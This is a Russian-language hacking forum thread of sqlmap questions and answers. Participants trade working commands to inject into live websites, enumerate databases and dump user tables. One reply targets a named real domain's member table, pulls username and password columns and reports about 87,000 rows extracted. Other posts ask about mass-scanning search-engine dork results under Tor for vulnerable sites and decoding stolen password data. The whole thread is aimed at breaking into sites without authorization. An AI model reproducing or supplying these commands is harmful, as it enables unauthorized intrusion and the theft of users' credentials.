Вопросы по SQLMap

Discussion in 'Уязвимости' started by randman, 1 Oct 2015.

  1. ms13

    ms13 Well-Known Member

    Joined:
    19 Jun 2015
    Messages:
    2,620
    Likes Received:
    12,507
    Reputations:
    116

    --dbms=mysql --level 5
     
    ol1ver likes this.
  2. 0xrust

    0xrust New Member

    Joined:
    20 Apr 2013
    Messages:
    22
    Likes Received:
    0
    Reputations:
    0
    можно еще --risk 3 добавить
     
  3. ms13

    ms13 Well-Known Member

    Joined:
    19 Jun 2015
    Messages:
    2,620
    Likes Received:
    12,507
    Reputations:
    116
    можно)
     
  4. .Light.

    .Light. New Member

    Joined:
    12 Jul 2010
    Messages:
    197
    Likes Received:
    4
    Reputations:
    0
    как сделать дамп бд с сохранением структуры таблиц.
    Таблица 1 Таблица 2 Таблица 3
    11111111 222222222 333333333

    А не строчками,делаю дамп получается 11111111222222222333333333 - не очень удобно
     
  5. ruslan0477

    ruslan0477 New Member

    Joined:
    6 Dec 2015
    Messages:
    23
    Likes Received:
    0
    Reputations:
    0
    Подскажите дамп открыл таблицу сразу а sqlmap перебирает по букве.Что я делаю не так?
    sqlmap -u http://www.site.ru/showbanner.php?banner_id=' and [t] and '1'='1 --dbs
     
  6. ruslan0477

    ruslan0477 New Member

    Joined:
    6 Dec 2015
    Messages:
    23
    Likes Received:
    0
    Reputations:
    0
    да
    А дампом могу только 50 к слить
     
  7. ruslan0477

    ruslan0477 New Member

    Joined:
    6 Dec 2015
    Messages:
    23
    Likes Received:
    0
    Reputations:
    0
    Ну так дорка у меня такая и есть без id
    http://www.site.ru/showbanner.php?banner_id=' and [t] and '1'='1 --dbs
    просто кавычка
     
  8. ms13

    ms13 Well-Known Member

    Joined:
    19 Jun 2015
    Messages:
    2,620
    Likes Received:
    12,507
    Reputations:
    116
    Пробуй так!

    sqlmap -u www.site.ru/showbanner.php?banner_id=X --dbs --no-cast

    где X - тот id, к которому ты сначала тыкал свою каывчку, больше ничего не надо, map сам всё подберёт!

    Но учти, после этой команды ты лишь узнаешь кол-во и имена БД...


    Далее узнаёшь кол-во и имена таблиц в нужной БД:

    sqlmap -u www.site.ru/showbanner.php?banner_id=X -D Y --tables --no-cast

    где Y - имя нужной БД.


    После дампишь нужную тебе таблицу:

    sqlmap -u www.site.ru/showbanner.php?banner_id=X -D Y -T Z --dump --no-cast

    где Z - имя нужной таблицы

    Иногда, если извлекается очень медленно, можно добавить ключ --threads 10 , например - те увеличить кол-во потоков.
     
    #108 ms13, 20 Jan 2016
    Last edited: 20 Jan 2016
    Ruslan1993it likes this.
  9. ruslan0477

    ruslan0477 New Member

    Joined:
    6 Dec 2015
    Messages:
    23
    Likes Received:
    0
    Reputations:
    0
    C:\sqlmap.pyc sqlmap.pyc -u http://www.site.ru/showbanner.php?banner_id= -D sokulec_dev -T soku_member_14July2015 -C contact_email,password --dump Тоже самое.А таблицу я взял с дампера
     
  10. ruslan0477

    ruslan0477 New Member

    Joined:
    6 Dec 2015
    Messages:
    23
    Likes Received:
    0
    Reputations:
    0
    [17:58:04] [CRITICAL] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Please retry with the switch '--text-only' (along with --technique=BU) as this case looks like a perfect candidate (low textual content along with inability of comparison engine to detect at least one dynamic parameter). Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment')

    Что бы это значило?
     
  11. ms13

    ms13 Well-Known Member

    Joined:
    19 Jun 2015
    Messages:
    2,620
    Likes Received:
    12,507
    Reputations:
    116
    sqlmap -u www.sokule.com/showbanner.php?banner_id=1 -D sokulec_dev -T soku_member_14July2015 --dump -C username,password --no-cast --threads 10

    Всё там нормально извлекается, не морочь голову...
     
  12. ms13

    ms13 Well-Known Member

    Joined:
    19 Jun 2015
    Messages:
    2,620
    Likes Received:
    12,507
    Reputations:
    116
    --level 5 --risk 3
     
  13. ms13

    ms13 Well-Known Member

    Joined:
    19 Jun 2015
    Messages:
    2,620
    Likes Received:
    12,507
    Reputations:
    116

    the SQL query used returns 86951 entries

    Чтобы не быть голословным...



    Ты спорить взялся, или совета просишь!?
    Причём здесь твоя дорка? Не пойму никак...
    Ну да ладно, всё получилось, все молодцы! :)
     
    #113 ms13, 20 Jan 2016
    Last edited: 20 Jan 2016
  14. .Light.

    .Light. New Member

    Joined:
    12 Jul 2010
    Messages:
    197
    Likes Received:
    4
    Reputations:
    0
    Как вытащить первые 10 записей из дампа?
     
  15. chatanti

    chatanti Member

    Joined:
    13 Jul 2011
    Messages:
    30
    Likes Received:
    16
    Reputations:
    0
    коллеги, подскажие какой-нибудь софт для первичного анализа выдачи по доркам. Запускаю под тором sqlmap, начинаю с N-й страницы выдачи, ставлю на ночь - все равно мало сайтов хекается. Хотелось бы софтинку, которой дорк задаешь, она чекает за минуту пару сотен сайтов и выдает, допустим 20 уязвимых. Потом скармливаешь это sqlmap по списку. Кто что использует? Проблема большинства программ в том, что гугл выплевывать капчу начинает через через какое-то время. Есть может у кого-то софт который через какой-нибудь duckduckgo работает?
     
  16. Galahem

    Galahem New Member

    Joined:
    12 Jul 2011
    Messages:
    25
    Likes Received:
    0
    Reputations:
    0
    limit 10,0
     
  17. grimnir

    grimnir Members of Antichat

    Joined:
    23 Apr 2012
    Messages:
    1,097
    Likes Received:
    792
    Reputations:
    230
    --stop=10
     
    _________________________
  18. Bobrenz

    Bobrenz New Member

    Joined:
    29 Jul 2015
    Messages:
    23
    Likes Received:
    0
    Reputations:
    0
    уважаемые, вопрос. была уязвимостьь, ее прикрыли ну или по текущй ссылке она уже не доступна, поднял проверку до лвл 5 риск 3, нашел уязвимость пишет что таблица не достуна, что-то можно сделать?
     
  19. octer

    octer New Member

    Joined:
    4 Feb 2016
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    Здравствуйте. Бывает когда делаю дамп таблицы с паролями вместо паролей непонятные строки (наверное в какой-то кодировке) вот пример:

    \x9dęś\x8b\x0f§$(éę\x86ťšŻĹë
    ´Ë\x8cž\x04,ŹĆR|^\x85Ľ^\x14v
    \x02Ő6N\x8důž@ůĺIžN\rN]

    Кто-нибудь сталкивался? Как узнать нормальный пароль?
     
  20. magichead

    magichead New Member

    Joined:
    9 Feb 2016
    Messages:
    10
    Likes Received:
    0
    Reputations:
    0
    --sql-shell как его залить?
     
Loading...